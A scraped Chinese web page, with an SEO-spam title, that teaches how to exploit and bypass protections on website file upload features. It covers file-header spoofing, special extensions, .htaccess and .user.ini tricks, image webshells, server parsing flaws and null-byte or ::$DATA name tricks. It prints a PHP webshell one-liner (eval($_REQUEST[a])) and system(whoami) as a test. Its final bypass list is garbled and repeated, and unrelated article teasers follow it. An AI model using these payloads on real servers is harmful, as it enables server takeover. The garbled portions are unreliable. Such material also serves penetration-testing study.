网站专题页面案例2015年做那个网站致富

web/2025/10/1 5:56:40/文章来源:
网站专题页面案例,2015年做那个网站致富,推广网站广告,wordpress 图片选择文件上传基础篇 文件上传漏洞原理 ​ 目标网站存在文件上传接口#xff0c;但是对用户上传的文件没有做仔细甄别#xff0c;导致黑客可以根据此功能点直接上传木马到网站服务器#xff0c;造成危害 文件上传存在点 ​ 通常有头像上传#xff0c;pdf上传 文件上传防护 …文件上传基础篇 文件上传漏洞原理 ​ 目标网站存在文件上传接口但是对用户上传的文件没有做仔细甄别导致黑客可以根据此功能点直接上传木马到网站服务器造成危害 文件上传存在点 ​ 通常有头像上传pdf上传 文件上传防护 ​ 前后端同时验证文件后缀黑白名单校验文件头校验文件内容校验mime,二次渲染 文件上传绕过防护 前端校验直接警用js或者修改js代码也可以使用burp抓包修改文件名 文件头校验常见于图片上传点服务器会检测文件类型的文件头 常见文件头 JPEG (jpg)  文件头FFD8FF               文件尾FF D9                PNG (png)   文件头89504E47              文件尾AE 42 60 82 GIF (gif) 文件头47494638              文件尾00 3B ZIP Archive (zip) 文件头504B0304                      文件尾50 4BTIFF (tif)   文件头49492A00                      文件尾 Windows Bitmap (bmp)   文件头424D                         文件尾 CAD (dwg)   文件头41433130                      文件尾 Adobe Photoshop (psd) 文件头38425053                      文件尾 Rich Text Format (rtf) 文件头7B5C727466                     文件尾 XML (xml) 文件头3C3F786D6C                     文件尾 HTML (html) 文件头68746D6C3E Email [thorough only] (eml) 文件头44656C69766572792D646174653A Outlook Express (dbx) 文件头CFAD12FEC5FD746F Outlook (pst) 文件头2142444E MS Word/Excel (xls.or.doc) 文件头D0CF11E0 MS Access (mdb) 文件头5374616E64617264204A WordPerfect (wpd) 文件头FF575043 Adobe Acrobat (pdf) 文件头255044462D312E Quicken (qdf) 文件头AC9EBD8F Windows Password (pwl) 文件头E3828596RAR Archive (rar) 文件头52617221 Wave (wav) 文件头57415645 AVI (avi) 文件头41564920 Real Audio (ram) 文件头2E7261FD Real Media (rm) 文件头2E524D46 MPEG (mpg) 文件头000001BA MPEG (mpg) 文件头000001B3 Quicktime (mov) 文件头6D6F6F76 Windows Media (asf) 文件头3026B2758E66CF11 MIDI (mid) 文件头4D546864MIME校验即http数据包中的Content-Type字段直接用burp抓包修改此字段 二次渲染上传的文件被服务器端修改了常见于头像上传 (1)上传gif图片先将普通的gif图片上传会被渲染渲染之后再下载下来与原git图片对比找到渲染前后没有变化的位置然后在这些位置插入一句话木马再上传即可。 (2)上传jpg图片这两种格式图片的二次渲染绕过要难很多很多(索引类型图写入 PLTE 数据块或写入IDAT数据块)jpg(成功性不大) 条件竞争当文件上传后会短暂存在然后被删除时利用短时间大量高并发不停写入文件文件作用为生成木马文件当服务器未来得及删除文件时成功创建木马文件 黑名单:限制一些文件后缀例如exe,php,jsp,asp等 上传特殊可解析后缀 asp|asa|cer|cdx aspx|ascx|ashx|asax|asac php|php2|php3|php4|php5|asis|htaccess|.user.ini|phtm|phtml、pht(是否解析需要根据配置文件中设置类型来决定) jsp|jspx|jspf htm|html|shtml|pwml|js vbs|asis|sh|reg|cgi|exe|dll|com|bat|pl|cfc|cfm|ini上传.htaccess .htaccess文件是Apache服务器中的一个配置文件它负责相关目录下的网页配置。通过 .htaccess文件可以实现网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能IIS平台上不存在该文件该文件默认开启启用和关闭在 httpd.conf 文件中配置。.htaccess 文件生效前提条件为 mod_rewrite 模块开启 AllowOverride All上传.user.ini文件 原理 1、.user.ini 有点像.htaccessphp运行时会检索加载所有目录下的.ini配置文件从被执行的 PHP 文件所在目录开始一直上升到 web 根目录$_SERVER[DOCUMENT_ROOT] 所指定的。 2、.user.ini是一个能被动态加载的ini文件这点和php.ini不同。也就是说修改了.user.ini后不需要重启服务器中间件只需要等待user_ini.cache_ttl所设置的时间默认为300秒即可被重新加载。 利用 上传.user.ini auto_prepend_file1.gif # 要访问的文件加载之前加载 或者 auto_append_file1.gif # 要访问的文件加载之后加载上传一个包含webshell代码的1.gif GIF98A ?php eval($_REQUEST[a]);?访问本目录下任意文件附带参数?axxx 就可以实现命令执行 ?aphpinfo(); ?asystem(whoami);白名单只允许规定文件后缀上传常见头像上传限制只能为gif,png,jpg后缀上传 图片马结合文件包含漏洞,将恶意代码放在图片马中 生成图片马 制作方法 copy 1.jpg/b 1.php/a 2.jpg b表示二进制文件 a表示ASCII文件也可以使用edjpgcom.exe工具然后结合文件包含漏洞利用配合解析漏洞 IIS 目录解析漏洞(/test.asp/1.jps) 文件名解析漏洞(test.asp;.jpg) 畸形解析漏洞test.jpg/*.phpNginx 畸形解析漏洞(test.jpg/*.php) %00空字节代码解析漏洞 CVE-2013-4547(%20%00)Apache: 文件名解析漏洞test.php.owf.xdx利用NTFS ADS特性 其他 点绕过、空格绕过、后缀双写绕过、后缀大小写绕过、%00绕过、0x00绕过GET shell.php%00.jpg POST hex里面改 shell.php%20%00.jpg shell.php. shell.php. . 00截断、MIME、点、空格、点空格点、::$DATA shell.php::$DATA shell.php shell.php. shell.php. . GET shell.php%00.jpg POST hex里面改 shell.php%20%00.jpg. shell.php. . 00截断、MIME、点、空格、点空格点、:: D A T A s h e l l . p h p : : DATA shell.php:: DATAshell.php::DATA shell.php shell.php. shell.php. . GET shell.php%00.jpg POST hex里面改 shell.php%20%00.jpg

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/84881.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

西安网站制作流程中国网库企业黄页

燃财经(ID:rancaijing)原创 作者 | 杜枫 编辑 | 魏佳中国互联网的发展,是一部由大佬撑起的奋斗史,也是一部由大佬主演的打脸史。和传统行业不同,互联网行业日新月异,从业者趋于年轻。马云唱起了摇滚&#x…

做网站主流技术免费网页模板源代码

文 │ 骨朵国漫一、各漫画平台总体趋势1、快看漫画快看漫画平台2019年Q2各月评论数较Q1有较明显的下滑,月评论数都在400万条左右;收藏数方面,2019年2月达到了半年内最高值,为2660.1万条。2、看漫画、知音漫客等平台(小明太极旗下)…

长沙网站改版域名备案 网站名称

2020年艰难而短暂,而互联网的历史车轮还是轰隆隆一路向前,服务网格/云原生/Serverless架构,各种新架构大行其道。重新审视当下主流的编程语言,天下第一的Java已老,下行多年的.NET却浴火重生,焕发生机&#…

福州网站建站建立网站就可以赚钱了吗

共阴极或者共阳极数码管,因为其需要电流大,而一般51输出电流低,需要锁存器。买的开发板使用的共阴极数码管。至于其构造,找个相关方面的书看看,这里主要是对做好的电路板进行编程。刚开始的时候,感觉在数码…

南京营销网站建设开的免费网站能赚钱吗

[简介] 常用网名: 猪头三 出生日期: 1981.XX.XXQQ: 643439947 个人网站: 80x86汇编小站 编程生涯: 2001年~至今[共22年] 职业生涯: 20年 开发语言: C/C、80x86ASM、PHP、Perl、Objective-C、Object Pascal、C#、Python 开发工具: Visual Studio、Delphi、XCode、Eclipse、C Bui…

昂昂溪网站建设建立网站的目的和意义

题解:ABC275D - Yet Another Recursive Function 题目 链接:Atcoder。 链接:洛谷。 难度 算法难度:普及。 思维难度:入门。 调码难度:入门。 综合评价:简单。 算法 记忆化深度优先搜索…

网络营销网站建设存在问题大连网站建设比较好的公司

XML(可扩展标记语言)是一种常用于存储和交换数据的标记语言,而Java是一种强大的编程语言,它具有处理XML的能力。在本篇博客中,我们将探讨XML的基础知识,学习如何在Java中解析和生成XML文档,以及…

学校网站首页制作网站APP注册做任务

目录 一、类型推断和类型注解二.类型注解,声明时指定类型三、类型断言四、基础类型和联合类型字符串数字和浮点类型布尔空和undefined多类型值限定 五、数组 元组 枚举数组元组,?代表可选参数枚举枚举使用 六、函数函数作为参数 七、类、接口与抽象类类访问修饰符类…

深圳专业建设网站哪个公司好传奇网站模板免费下载

最近,我重新发现了我遗忘的JBoss Fuse功能,并且我认为其他人可能会从此提醒中受益 。 这篇文章将重点放在JBoss Fuse和Fabric8上,但所有正在寻找最小侵入性方法来为其静态配置文件添加一定程度的动态支持的开发人员也可能会对此感兴趣。 在…

广州网站建设:深圳推广平台有哪些

文章目录 前言一、新增磁盘二、初始化磁盘1.查看2.初始化3.挂载 总结 前言 虚拟机磁盘空间很散乱,大部分都在/root和/home下不好操作,故考虑新增磁盘、增加挂载点。 一、新增磁盘 右键打开虚拟机设置 二、初始化磁盘 1.查看 fdisk -l2.初始化 …

建设公司网站入账关闭开发者模式

IDEA插件 一、GenerateAllSetter插件介绍二、如何下载安装三、如何使用 总结 最近项目上有些测试需要有很多属性,而且大部分的属性都是要设置值的,一个一个手动set设值很繁琐,就想着有没有能解决这个问题的办法,就发现了一个非常好…

婚庆网站开发要达到的目标安卓开发自学教程

说明: 关于设计模式的文章网上已经很多了,本人也只是想参考别人的文章来系统地学习一下设计模式,因此,这个系列并不是一个系列教程,而仅仅是作为本人学习设计模式的一个学习笔记,此外,由于本人能…

程序员做图网站wordpress音频在移动端播放不

目录 1. QNX电源管理框架 2. QNX客户端API库 3. QNX代码分析 4. Fuchsia中的电源管理 5. Minix中的电源管理 6. Harmony OS中的电源管理 之前介绍的电源管理机制基本都是在Linux中实现的,可以看到很复杂,各种框架,明明一个操作非要转来转去,而且在内核里面实现,跟内…

东营网站的优化怎么查权重查询

本文主要介绍了Docker容器的单机网络架构与集群网络架构,辅以演示,并简单介绍了网络管理中的命令。 前文: Docker的安装与简单操作命令-CSDN博客 docker网络原理介绍 与ovs类似,docker容器采用veth-pair linux bridge (虚拟交…

关于网站建设的合同购买域名和服务器

希尔排序(Shell Sort)是插入排序的一种,它是针对直接插入排序算法的改进。该方法又称缩小增量排序,因DL.Shell于1959年提出而得名。 希尔排序实质上是一种分组插入方法。它的基本思想是:对于n个待排序的数列,取一个小于…

山东网站建设低多边形生成网站

近期,关于 ChatGPT 的访问量有所下降的消息引发激烈讨论,不过这并不意味着开发者对于 AIGC 的热情有所减弱,例如素有【2023 最潮大语言模型 Web 开发框架】之称的大网红 LangChain 的热度就只增不减。 原因在于 LangChain 作为大模型能力“B2…

淮安建立公司网站流程建设网站的推广的软文

在 Linux C 语言环境下进行 UDP 通信时,您会使用多个标准的系统调用和函数来创建和管理 UDP 套接字。以下是一些在 UDP 通讯中常用的函数: **socket()**: 创建套接字。对于 UDP 通信,第二个参数选择 SOCK_DGRAM。 int sockfd so…

云南微网站搭建软件项目流程八个阶段

房价是一个城市发展程度的重要体现,一个城市的房价越高通常代表这个城市越发达,对于人口的吸引力越大!因此,房价数据是我们在各项城市研究中都非常常用的数据!之前我们分享了2019—2023年我国地级市逐月的新房房价数据…

河北建设厅网站上不去wordpress登陆可见插件

1、安装驱动 使用 npm 进行安装 mysql $ npm install mysql 2、连接数据库 在以下实例中根据你的实际配置修改数据库用户名、及密码及数据库名: test.js 文件 var mysql require(mysql); var connection mysql.createConnection({host : localhost…

天津网站建设是什么空间商网站

Module语法 CommonJS模块 let { readfile } require(fs) # 等同于 let _fs require(fs) let readfile _fs.readfile //这种加载称为“运行时加载”ES6模块 import { stat, exists, readFile } from fs;这种加载称为“编译时加载”或者静态加载 静态加载带来的各种好处 …